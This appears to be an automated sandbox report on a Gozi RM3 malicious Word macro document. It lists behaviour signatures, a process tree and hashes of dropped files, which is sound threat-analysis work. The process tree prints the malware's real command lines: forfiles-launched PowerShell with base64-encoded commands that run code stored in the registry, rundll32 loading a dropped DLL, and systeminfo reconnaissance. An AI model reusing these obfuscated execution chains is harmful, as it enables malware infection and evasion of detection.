Analysis

  • max time kernel
    150s
  • max time network
    154s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-en-20220113
  • submitted
    07-04-2022 13:58

General

  • Target

    request.docm

  • Size

    526KB

  • MD5

    9b96a79a5e52ce888306ae92bf6668dc

  • SHA1

    5e50023b851d24e7b16afa48eaa0904b5368259d

  • SHA256

    6cf97570d317b42ef8bfd4ee4df21d217d5f27b73ff236049d70c37c5337909f

  • SHA512

    117f93c86cda5fd51e7b5c869dd3067b391ad1bdebf4dbb358243d42e6ae6eea612b12d568a18a5ea47050977da4c9312aa93c5c9de9b3373b25e5e7d0edad31

Score
10/10

Malware Config

Extracted

Family

gozi_rm3

Attributes
  • build

    300994

rsa_pubkey.base64
rsa_pubkey.plain

Signatures

  • Gozi RM3

    A heavily modified version of Gozi using RM3 loader.

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Downloads MZ/PE file
  • Loads dropped DLL 1 IoCs
  • Uses Tor communications 1 TTPs

    Malware can proxy its traffic through Tor for more anonymity.

  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Gathers system information 1 TTPs 1 IoCs

    Runs systeminfo.exe.

  • Modifies Internet Explorer settings 1 TTPs 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 8 IoCs
  • Suspicious behavior: MapViewOfSection 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of FindShellTrayWindow 11 IoCs
  • Suspicious use of SetWindowsHookEx 52 IoCs
  • Suspicious use of WriteProcessMemory 60 IoCs

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
      PID:2712
      • C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
        "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\request.docm" /o ""
        2⤵
        • Checks processor information in registry
        • Enumerates system info in registry
        • Suspicious behavior: AddClipboardFormatListener
        • Suspicious use of SetWindowsHookEx
        • Suspicious use of WriteProcessMemory
        PID:3304
        • C:\Windows\SYSTEM32\rundll32.exe
          rundll32 "C:\Users\Admin\AppData\Local\Temp\y3C4B.tmp.dll",DllRegisterServer
          3⤵
          • Process spawned unexpected child process
          • Suspicious use of WriteProcessMemory
          PID:3048
          • C:\Windows\SysWOW64\rundll32.exe
            rundll32 "C:\Users\Admin\AppData\Local\Temp\y3C4B.tmp.dll",DllRegisterServer
            4⤵
            • Loads dropped DLL
            • Suspicious behavior: MapViewOfSection
            • Suspicious use of WriteProcessMemory
            PID:4548
      • C:\Windows\System32\cmd.exe
        "C:\Windows\System32\cmd.exe" /c start /min forfiles /c "cmd /k @path -ec aQBlAHgAIAAoAGcAcAAgACcASABLAEMAVQA6AFwAUwBvAGYAdAB3AGEAcgBlAFwAVgBlAHIAcwBpAG8AbgBkAGEAeQAnACkALgBCAA== & exit" /p C:\Windows\system32 /s /m po*l.e*e
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:1304
        • C:\Windows\system32\forfiles.exe
          forfiles /c "cmd /k @path -ec aQBlAHgAIAAoAGcAcAAgACcASABLAEMAVQA6AFwAUwBvAGYAdAB3AGEAcgBlAFwAVgBlAHIAcwBpAG8AbgBkAGEAeQAnACkALgBCAA== & exit" /p C:\Windows\system32 /s /m po*l.e*e
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:3604
          • C:\Windows\system32\cmd.exe
            /k "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" -ec aQBlAHgAIAAoAGcAcAAgACcASABLAEMAVQA6AFwAUwBvAGYAdAB3AGEAcgBlAFwAVgBlAHIAcwBpAG8AbgBkAGEAeQAnACkALgBCAA== & exit
            4⤵
            • Suspicious use of WriteProcessMemory
            PID:4132
            • C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
              C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -ec aQBlAHgAIAAoAGcAcAAgACcASABLAEMAVQA6AFwAUwBvAGYAdAB3AGEAcgBlAFwAVgBlAHIAcwBpAG8AbgBkAGEAeQAnACkALgBCAA==
              5⤵
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious behavior: MapViewOfSection
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of WriteProcessMemory
              PID:2696
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -E JwBwAGEAcgBhAG0AKAAkAGgAcgBoAGMAZQB3AGQAYQB4AGUAKQA7AFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAkAGgAcgBoAGMAZQB3AGQAYQB4AGUAKQAnAA==
                6⤵
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:3532
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -E JwBwAGEAcgBhAG0AKAAkAGQAZgBvAG0AaABlAGwAcwBvAGgAKQA7AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGYAbwBtAGgAZQBsAHMAbwBoACkAJwA=
                6⤵
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:3788
              • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\egkdud3f\egkdud3f.cmdline"
                6⤵
                • Suspicious use of WriteProcessMemory
                PID:4224
                • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES334D.tmp" "c:\Users\Admin\AppData\Local\Temp\egkdud3f\CSCCFB4F460216A4B1E94B7C02DC93EA71D.TMP"
                  7⤵
                    PID:4668
                • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                  "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\xq11admz\xq11admz.cmdline"
                  6⤵
                  • Suspicious use of WriteProcessMemory
                  PID:3260
                  • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                    C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES34A5.tmp" "c:\Users\Admin\AppData\Local\Temp\xq11admz\CSC641A5E0419CD4897B376AE9FF58C438.TMP"
                    7⤵
                      PID:3436
          • C:\Windows\system32\cmd.exe
            cmd /C "systeminfo.exe" >> C:\Users\Admin\AppData\Local\Temp\7CFE.bin0
            2⤵
            • Suspicious use of WriteProcessMemory
            PID:1844
            • C:\Windows\system32\systeminfo.exe
              systeminfo.exe
              3⤵
              • Gathers system information
              PID:3024
        • C:\Program Files (x86)\Internet Explorer\ielowutil.exe
          "C:\Program Files (x86)\Internet Explorer\ielowutil.exe" -CLSID:{0002DF01-0000-0000-C000-000000000046} -Embedding
          1⤵
            PID:2132
          • C:\Program Files\Internet Explorer\iexplore.exe
            "C:\Program Files\Internet Explorer\iexplore.exe" -Embedding
            1⤵
            • Modifies Internet Explorer settings
            • Suspicious use of FindShellTrayWindow
            • Suspicious use of SetWindowsHookEx
            • Suspicious use of WriteProcessMemory
            PID:1140
            • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
              "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1140 CREDAT:17410 /prefetch:2
              2⤵
              • Modifies Internet Explorer settings
              • Suspicious use of SetWindowsHookEx
              PID:4856
            • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
              "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1140 CREDAT:17416 /prefetch:2
              2⤵
              • Modifies Internet Explorer settings
              • Suspicious use of SetWindowsHookEx
              PID:4252
            • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
              "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1140 CREDAT:17422 /prefetch:2
              2⤵
              • Modifies Internet Explorer settings
              • Suspicious use of SetWindowsHookEx
              PID:204
            • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
              "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1140 CREDAT:17428 /prefetch:2
              2⤵
              • Modifies Internet Explorer settings
              • Suspicious use of SetWindowsHookEx
              PID:2792
            • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
              "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1140 CREDAT:17434 /prefetch:2
              2⤵
              • Modifies Internet Explorer settings
              • Suspicious use of SetWindowsHookEx
              PID:3672
            • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
              "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1140 CREDAT:17440 /prefetch:2
              2⤵
              • Modifies Internet Explorer settings
              • Suspicious use of SetWindowsHookEx
              PID:1132
            • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
              "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1140 CREDAT:82946 /prefetch:2
              2⤵
              • Modifies Internet Explorer settings
              • Suspicious use of SetWindowsHookEx
              PID:3420
            • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
              "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1140 CREDAT:17450 /prefetch:2
              2⤵
              • Modifies Internet Explorer settings
              • Suspicious use of SetWindowsHookEx
              PID:2836
            • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
              "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1140 CREDAT:17456 /prefetch:2
              2⤵
              • Modifies Internet Explorer settings
              • Suspicious use of SetWindowsHookEx
              PID:4572
            • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
              "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1140 CREDAT:17462 /prefetch:2
              2⤵
              • Modifies Internet Explorer settings
              • Suspicious use of SetWindowsHookEx
              PID:3104
            • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
              "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1140 CREDAT:17468 /prefetch:2
              2⤵
              • Modifies Internet Explorer settings
              • Suspicious use of SetWindowsHookEx
              PID:4444

          Network

          MITRE ATT&CK Enterprise v6

          Replay Monitor

          Loading Replay Monitor...

          Downloads

          • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751

            Filesize

            717B

            MD5

            54e9306f95f32e50ccd58af19753d929

            SHA1

            eab9457321f34d4dcf7d4a0ac83edc9131bf7c57

            SHA256

            45f94dceb18a8f738a26da09ce4558995a4fe02b971882e8116fc9b59813bb72

            SHA512

            8711a4d866f21cdf4d4e6131ec4cfaf6821d0d22b90946be8b5a09ab868af0270a89bc326f03b858f0361a83c11a1531b894dfd1945e4812ba429a7558791f4f

          • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751

            Filesize

            192B

            MD5

            d54855bf8c978d6881061a312a75333c

            SHA1

            9f9aa8fa71f3303ed698314afb8fba1619c219cf

            SHA256

            f67682e075a617f3e515ee10afc379de518474ba79a2c05f23beece24f5f6885

            SHA512

            00e7c63a7221e8c9f1f6e0d4c4cbe0512d7066c8bc8577b3b60704dc98e9e0f3f113dea521b984105f1bbdc8a0fba26ba3255983fb784ad2b83dd7ddfa312525

          • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

            Filesize

            2KB

            MD5

            d85ba6ff808d9e5444a4b369f5bc2730

            SHA1

            31aa9d96590fff6981b315e0b391b575e4c0804a

            SHA256

            84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

            SHA512

            8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

          • C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\imagestore\ves0881\imagestore.dat

            Filesize

            430B

            MD5

            78b511d855aeaeaecb11a56e5688b33b

            SHA1

            587dc3bf982a864ecc1f05e25c7a2b47669041c5

            SHA256

            23b6b63e9c1b265a58dab316ebc104bed61c4da22ca414aeecc3f1576a106877

            SHA512

            35e67e2e15419541d44f0147a20cbe446c2e8ee78fabd609bb3328e0cc6051987859492179124f92fc6b37cb9f250c7c5d881c39e31b3279faf55fc4d810f173

          • C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\OMK7HR9K\favicon[1].ico

            Filesize

            318B

            MD5

            a976d227e5d1dcf62f5f7e623211dd1b

            SHA1

            a2a9dc1abdd3d888484678663928cb024c359ee6

            SHA256

            66332859bd8e3441a019e073a318b62a47014ba244121301034b510dc7532271

            SHA512

            6754d545f2ce095cfa1fa7ca9e3223f89e37726ee7e541ebcf3e209e18b2602f3be8677598cb30d697327a63de032c11dbf8ef7ad7889a79c488a21044c1cb3f

          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

            Filesize

            64B

            MD5

            5caad758326454b5788ec35315c4c304

            SHA1

            3aef8dba8042662a7fcf97e51047dc636b4d4724

            SHA256

            83e613b6dc8d70e3bb67c58535e014f58f3e8b2921e93b55137d799fc8c56391

            SHA512

            4e0d443cf81e2f49829b0a458a08294bf1bdc0e38d3a938fb8274eeb637d9a688b14c7999dd6b86a31fcec839a9e8c1a9611ed0bbae8bd59caa9dba1e8253693

          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

            Filesize

            1KB

            MD5

            56eed407989b43f7fc53e2e7a47ab967

            SHA1

            a5c6b2f493199a08fabee50e6d588773952148f0

            SHA256

            efee8d1f6796868b832708e0b20a86e65736958419f2f7bbc97eb5d93346c6d3

            SHA512

            c15dfa9eb19eb2f7859043956f68f231c173c752409150f76fc0555cec11faf77aca175207ece0cad37767d72bd92af1969aba39f7be7c8df2fe0521bb426e64

          • C:\Users\Admin\AppData\Local\Temp\RES334D.tmp

            Filesize

            1KB

            MD5

            5741de2bc9b0d5ecef48b3028df0dd9b

            SHA1

            29f3fbae54db2849ef2615f0d17f06f7f12bff8e

            SHA256

            cfc3d7579b799c2f16631273e91f55474cc719b0409b3fe87c4a14911c85056f

            SHA512

            84b9a04799667fe83f061903ba8b7494d2aea5eed83daf96b007ffe74e0ca78d4e05e48ff96524359d7e8634be8bc15d5f0a7c81e9b6e94a1b1cc61506f76868

          • C:\Users\Admin\AppData\Local\Temp\RES34A5.tmp

            Filesize

            1KB

            MD5

            d0a800edf452d688094a90420d5b456c

            SHA1

            28b7c784e2b4a628110486670092516958016bc0

            SHA256

            aa1541327ae78726444da0c45b242430d3eb06fd33272ae1d08d3278cf708f2e

            SHA512

            bfef179f5b72366d22d11e06084bbaa6b832b36c4ff2cf77167b261858ad7997057d119da11ba667a4474f2363bb19e42fad8ba8a9189c7d65ff4350d1ec8665

          • C:\Users\Admin\AppData\Local\Temp\egkdud3f\egkdud3f.dll

            Filesize

            3KB

            MD5

            80e18b55cee5e8af4d3ff4ee134b34fa

            SHA1

            4155ac37939d6eeb45452690ab64738c1e3ab615

            SHA256

            4ad2c5581b3f9d9082d4e25a6d5180242e7fdfa7541cb6a007801961285494b0

            SHA512

            363d2263863a3ede29693945c1a0de9ba1ba2ceb6d8c241edbae674b85d495666b0d1045b5272d3010324f70bab1891b6eca44d5990889e173c7682c3df8890d

          • C:\Users\Admin\AppData\Local\Temp\xq11admz\xq11admz.dll

            Filesize

            3KB

            MD5

            64cb19d64dec3b03e1e1dca2211c4b75

            SHA1

            e5885ef88b716de48cb3c69f84abfd1456815c44

            SHA256

            1e3876a0b563af7ad9561cf1117da1a838c87edf2e8928b6d20a2cee85a23ed8

            SHA512

            33009acf143f4870dba14de82a95bda53e6c3c1e948dfc10259c6926151174250c66ebcc45b20a89bf08ad737998f289de973bebc8c208f6fcec39cb103310a8

          • C:\Users\Admin\AppData\Local\Temp\y3C4B.tmp.dll

            Filesize

            151KB

            MD5

            55ab2f304f8c2da30aeee7713a95064d

            SHA1

            aae939cf3995905399e427097fc90c5b62f3d4c3

            SHA256

            41ae907a2bb73794bb2cff40b429e62305847a3e1a95f188b596f1cf925c4547

            SHA512

            08bbf78b4154f725399055dfb8a4338ce873297af847a5e30c8b6708e44feeae071fbf7efff9ff2c0b397fdffec5ca52a9591f742092a8f50287e54ce89307d3

          • C:\Users\Admin\AppData\Local\Temp\y3C4B.tmp.dll

            Filesize

            151KB

            MD5

            55ab2f304f8c2da30aeee7713a95064d

            SHA1

            aae939cf3995905399e427097fc90c5b62f3d4c3

            SHA256

            41ae907a2bb73794bb2cff40b429e62305847a3e1a95f188b596f1cf925c4547

            SHA512

            08bbf78b4154f725399055dfb8a4338ce873297af847a5e30c8b6708e44feeae071fbf7efff9ff2c0b397fdffec5ca52a9591f742092a8f50287e54ce89307d3

          • \??\c:\Users\Admin\AppData\Local\Temp\egkdud3f\CSCCFB4F460216A4B1E94B7C02DC93EA71D.TMP

            Filesize

            652B

            MD5

            361fa3afdf10716d56e8be0162c0551a

            SHA1

            b29f0930a116169ac0dc2f412f20da5f7c7a965d

            SHA256

            447858db58f02ec13d1b4b18f1cf704910bf405c3eebd82b1575c301efd71a05

            SHA512

            37d03c9b2dc2d98fea28898af3f37a201b882266fa4e2dfdd66b9b6125774d4e62364000353d6b184116fbd14921f79e11c0732d640b07a092d5d1e7243bd13b

          • \??\c:\Users\Admin\AppData\Local\Temp\egkdud3f\egkdud3f.0.cs

            Filesize

            417B

            MD5

            cdc42ce046de74fa8cb97234640cfcc5

            SHA1

            8a6aa5bda682fbb11bc974d752408593aec799cc

            SHA256

            7fca4a3b3889149b375ce11cd1614298a244c05e3dd5fa343be56986aaa675c5

            SHA512

            c2663ca8817dc7a375c06cfc4adb529ab61b098663a550feba5dabe8b9c6269a5e878419d5198cb463b9c6b4d5acb504587ffd5721eab568068a7e9d45d55d13

          • \??\c:\Users\Admin\AppData\Local\Temp\egkdud3f\egkdud3f.cmdline

            Filesize

            369B

            MD5

            06e9e918041f721534398e79ddb9a8c5

            SHA1

            d77e5e8cc9a9b737b0ded3654cbd906803ff230e

            SHA256

            066a48b39e430bdd3bb5bdc9cf69d3837d2077aa487f228e245417081db08e36

            SHA512

            c320500c1cd58cabf2a445ba159216cd000e1f4533e3636efb9da9d0998926857014d22632fad0c69537b92826486b760675bb4c933a354efabbd706ecf6ed89

          • \??\c:\Users\Admin\AppData\Local\Temp\xq11admz\CSC641A5E0419CD4897B376AE9FF58C438.TMP

            Filesize

            652B

            MD5

            cd8a3b1e1b08b13d7171528dfb1857ce

            SHA1

            a69cf691c6f4416e61a5b53f64466c168ac22f50

            SHA256

            ea4275ea72627c2a727005c014b99bdb28bef84917a68d0fa341de1cb1037480

            SHA512

            22bcb7c489dbf1eeaf2393d05e028f87a709b5fafd6f6ed60b9155ce27d88ecb020109ead10e8ba2753a480757a104a23068860c70ff7f99303f8cea3d8cf52e

          • \??\c:\Users\Admin\AppData\Local\Temp\xq11admz\xq11admz.0.cs

            Filesize

            416B

            MD5

            e991aa9d35bfffc8f1e0d5dcf4c95ed1

            SHA1

            02d81b5b8cfd7b25d4fa0dab40d6ce6db3129501

            SHA256

            2598df56dcfc916eb9ae7b571c67d2feb92740843e36caccf9df705c03145265

            SHA512

            e0205253f43832674a3ea5dbe376e82fe0a59722ca10bed0184ff8fa298111957437db32aefb725b8c525f62aa8c7bc14922fa665ec9ced0d465d91837da126b

          • \??\c:\Users\Admin\AppData\Local\Temp\xq11admz\xq11admz.cmdline

            Filesize

            369B

            MD5

            463dc4318014012ea9a23c72cf95026d

            SHA1

            88bed4062987c7933796449bee0af1f9636677f2

            SHA256

            7dc11a816badbbc03863a3f971f22a47caad2abed15ceb47c66c2c919dc26eb4

            SHA512

            fb9b7e99143bbf863abc29d26dd2b94fc18efd7ea844964a827163bc0c8e6830801049a3ad7c3054fed6e69d82ebb7ef146a4f082001dfb3a4a1757f38de027a

          • memory/2696-166-0x00000277EBF53000-0x00000277EBF55000-memory.dmp

            Filesize

            8KB

          • memory/2696-161-0x00000277EBF60000-0x00000277EBF82000-memory.dmp

            Filesize

            136KB

          • memory/2696-189-0x00000277EC2E0000-0x00000277EC2F3000-memory.dmp

            Filesize

            76KB

          • memory/2696-163-0x00007FF9993B0000-0x00007FF999E71000-memory.dmp

            Filesize

            10.8MB

          • memory/2696-165-0x00000277EBF50000-0x00000277EBF52000-memory.dmp

            Filesize

            8KB

          • memory/2696-167-0x00000277EBF56000-0x00000277EBF58000-memory.dmp

            Filesize

            8KB

          • memory/3304-136-0x0000024DD2937000-0x0000024DD29B0000-memory.dmp

            Filesize

            484KB

          • memory/3304-133-0x00007FF986FD0000-0x00007FF986FE0000-memory.dmp

            Filesize

            64KB

          • memory/3304-157-0x0000024DD280F000-0x0000024DD2811000-memory.dmp

            Filesize

            8KB

          • memory/3304-131-0x00007FF986FD0000-0x00007FF986FE0000-memory.dmp

            Filesize

            64KB

          • memory/3304-132-0x00007FF986FD0000-0x00007FF986FE0000-memory.dmp

            Filesize

            64KB

          • memory/3304-134-0x00007FF986FD0000-0x00007FF986FE0000-memory.dmp

            Filesize

            64KB

          • memory/3304-135-0x0000024DD280F000-0x0000024DD2811000-memory.dmp

            Filesize

            8KB

          • memory/3304-130-0x00007FF986FD0000-0x00007FF986FE0000-memory.dmp

            Filesize

            64KB

          • memory/3304-137-0x0000024DD69D0000-0x0000024DD6A0F000-memory.dmp

            Filesize

            252KB

          • memory/3532-164-0x00007FF9993B0000-0x00007FF999E71000-memory.dmp

            Filesize

            10.8MB

          • memory/3788-172-0x000001C99ABB6000-0x000001C99ABB8000-memory.dmp

            Filesize

            8KB

          • memory/3788-173-0x000001C99ABB0000-0x000001C99ABB2000-memory.dmp

            Filesize

            8KB

          • memory/3788-174-0x000001C99ABB3000-0x000001C99ABB5000-memory.dmp

            Filesize

            8KB

          • memory/3788-171-0x00007FF9993B0000-0x00007FF999E71000-memory.dmp

            Filesize

            10.8MB

          • memory/4548-147-0x00000000021A0000-0x00000000021B0000-memory.dmp

            Filesize

            64KB

          • memory/4548-142-0x0000000010000000-0x000000001000F000-memory.dmp

            Filesize

            60KB

          • memory/4548-191-0x0000000002050000-0x000000000205E000-memory.dmp

            Filesize

            56KB